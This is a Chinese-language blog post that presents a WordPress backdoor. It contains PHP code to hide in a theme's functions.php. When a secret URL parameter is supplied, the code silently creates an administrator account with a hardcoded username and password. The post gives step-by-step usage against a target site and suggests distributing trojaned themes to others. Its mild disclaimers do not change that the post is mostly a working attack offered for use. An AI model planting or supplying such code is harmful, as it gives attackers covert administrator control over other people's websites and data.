以前大家是不是总是听说过程序后门啦，网站后门啦之类的。

其实只要在你的主题里添加一段代码，你的博客账号，就从此呵呵了。想想太邪恶了，首先我先声明下，我分享的绝无，不信你们自己看，我没那么邪恶的。

//一段代码让你的博客从此毫无毫安全感
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '324a37da6577a6319378e23870852fee' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'exehack', 'exehack' );  //默认的后台登录帐号密码:exehack
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

这么一段代码加入主题的functions.php中，对方的网站就无处藏身了。

然后，你再加点别的，提示下对方正在用你的主题，在functions.php里或其他地方再加个链接触发就好了。然后，你只需要……就可以呵呵呵了！太邪恶了……

但是小残不建议这么干，请自觉使用！

使用方法：打开http://目标.com/?backdoor=ihuan 如果在二级目录就加个二级。

然后，你就可以使用你的密码来登陆他的后台了，正常登陆即可，管理员权限，也就是说，你甚至可以shell。具体不多说，自己百度。没办法，WP太强大了！！！超简单拿权。

我这里默认设置的账号密码是 账号：exehack 密码：exehack   就这样了，别做坏事！！！！！

但是删数据库、放黑页不是我们这些“三好学生”该干的。请收好您的好奇心！

本文来源于:小幻博客

---

作者： 小残 绳命不息 |折腾不止 |我一天不折腾心里难受
转载请以链接形式注明本文地址：https://www.exehack.net/3972.html
版权所有© 小残's Blog – 关注网络安全 | 本网站内容采用 BY-NC-SA 进行授权。